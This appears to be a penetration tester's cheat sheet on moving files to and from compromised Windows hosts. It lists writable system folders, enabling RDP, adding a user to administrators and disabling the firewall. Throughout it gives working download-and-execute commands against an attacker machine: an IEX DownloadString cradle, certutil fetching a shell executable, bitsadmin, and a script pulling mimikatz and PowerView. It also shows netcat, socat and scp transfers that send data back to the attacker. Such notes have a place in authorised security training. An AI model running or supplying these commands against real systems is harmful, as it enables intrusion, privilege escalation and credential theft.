Placing files in writeable paths
The following folders are by default writable by normal users (depends on Windows version - This is from W10 1803)
Copy C:\Windows\Tasks
C:\Windows\Temp
C:\windows\tracing
C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after peforming a version upgrade of Windows 10 )
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
SMB
On Kali, extract the tools.zip archive to a directory. Change to this directory and run either of the following to set up an SMB server:
Copy python3 / usr / share / doc / python3 - impacket / examples / smbserver . py tools .
python / usr / share / doc / python - impacket / examples / smbserver . py tools .
Support for smb2
Copy python3 /usr/share/doc/python3-impacket/examples/smbserver.py -smb2support tools $( pwd )
To copy files from Kali to Windows:
Copy copy \\ 192.168.1.11 \t ools \f ile.ext file.ext
To copy files from Windows to Kali:
Copy copy file.ext \\ 192.168.1.11 \t ools \f ile.ext
Connecting from Windows to Kali SMB
Copy # Kali - host SMB share
$ python3 /usr/share/doc/python3-impacket/examples/smbserver.py [sharename] [/path/to/share] # setup local share
# Target - connect to share
cmd > net view \\ [kali] # view remote shares
cmd > net use \\ [kali] \[ share] # connect to share
cmd > copy \\ [kali] \[ share] \[ src_file] [/path/to/dest_file] # copy file
RDP
Enable RDP Powershell:
Copy Set-ItemProperty 'HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server' - Name "fDenyTSConnections" - Value 0
Enable-NetFirewallRule - DisplayGroup "Remote Desktop"
or
reg add "HKLM:\SYSTEM\CurrentControlSet\Control\Terminal Server" / v fDenyTSConnections / t REG_DWORD / d 0 / f
Enable-NetFirewallRule - DisplayGroup "Remote Desktop"
Connect using xfreerdp:
Copy xfreerdp /u: < USERNAM E > /p: < PASSWOR D > /v: < TARGET_I P >
proxychains xfreerdp /u: < USERNAM E > /p: < PASSWOR D > /v: < TARGET_I P >
If RDP is available (or we can enable it), we can add our low privileged user to the administrators group and then spawn an administrator command prompt via the GUI:
Copy > net localgroup administrators <username> /add
Enable RDP and add User to:
Copy reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add HKLM \S ystem \C urrentControlSet \C ontrol \L sa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f
netsh advfirewall set allprofiles state off
net localgroup "remote desktop users" alice /add
Powershell .ps1
This is a simple powershell script to download files:
Copy $baseUrl = "http://192.168.119.139/"
$fileNames = @ ( "PowerUP.ps1" , "PowerView.ps1" , "mimikatz.exe" , "winPEASany.exe" )
$downloadPath = "C:\Winodws\Tasks"
foreach ($fileName in $fileNames) {
$url = $baseUrl + $fileName
$filePath = Join-Path $downloadPath $fileName
Invoke-WebRequest - Uri $url - OutFile $filePath
Write-Host "Downloaded $fileName to $filePath"
}
Powershell
Copy # Download file from remote to local
powershell - c ( New-Object Net.WebClient).DownloadFile( 'http://[host]:[port]/[file]' , '[file]' )
powershell - c "(new-object System.Net.WebClient).DownloadFile('http://10.11.0.4/wget.exe','C:\Users\offsec\Desktop\wget.exe')"
# Execute remote PS script
PS > IEX ( New-Object System.Net.WebClient).DownloadString( 'http://[kali]/[script].ps1' )
IWR
From Windows:
Copy IWR -Uri http://KALI_IP:PORT -OutFile C:\Path\To\File
Certutil
From kali:
Copy python3 -m http.server 9999
From Windows CMD:
Copy certutil - urlcache -split -f http: //< kali_ip > : 9999 / shell_445.exe C:\\Windows\\Tasks\\ shell_445.exe
Bitsadmin
From Windows cmd:
Copy bitsadmin /transfer badthings http://[kali]:[port]/[src_file] [dest_file]
SSH server
Let’s download a file to our Kali box using SCP. Start a SSH server if it is not already running
Copy systemctl start ssh.socket
Copy # Download from Kali
scp < usernam e > @ < kali_i p > :C:/Windows/Tasks/file.txt .
# Upload from Target
scp /tmp/linpeas.out kali@ < kali_i p > :/home/kali/Offensive/PGs/
Netcat
Windows:
Copy C:\Users\offsec > nc -nlvp 4444 > incoming.exe
listening on [any] 4444 ...
Kali:
Copy kali@kali:~$ locate wget.exe
/usr/share/windows-resources/binaries/wget.exe
kali@kali:~$ nc -nv 10.11.0.22 4444 < /usr/share/windows-resources/binaries/wget.exe
( UNKNOWN ) [10.11.0.22] 4444 (?) open
The connection is received by Netcat on the Windows machine as shown below:
Copy C:\Users\offsec > nc - nlvp 4444 > incoming.exe
listening on [ any ] 4444 ...
connect to [ 10.11 . 0.22 ] from < UNKNOWN) [ 10.11 . 0.4 ] 43459
^C
C:\Users\offsec >
Socat
Alice wants to share a file with Bob:
Copy kali@kali:~$ sudo socat TCP4-LISTEN:443,fork file:secret_passwords.txt
Bob downloads the file from Alice host:
Copy C:\Users\offsec > socat TCP4: 10.11 . 0.4 : 443 file:received_secret_passwords.txt , create
Servers
Python2
Copy python -m SimpleHTTPServer 7331
Python3
Copy python3 -m http.server 7331
PHP
Ruby
Copy ruby -run -e httpd . -p 9000
Busybox
Copy busybox httpd -f -p 10000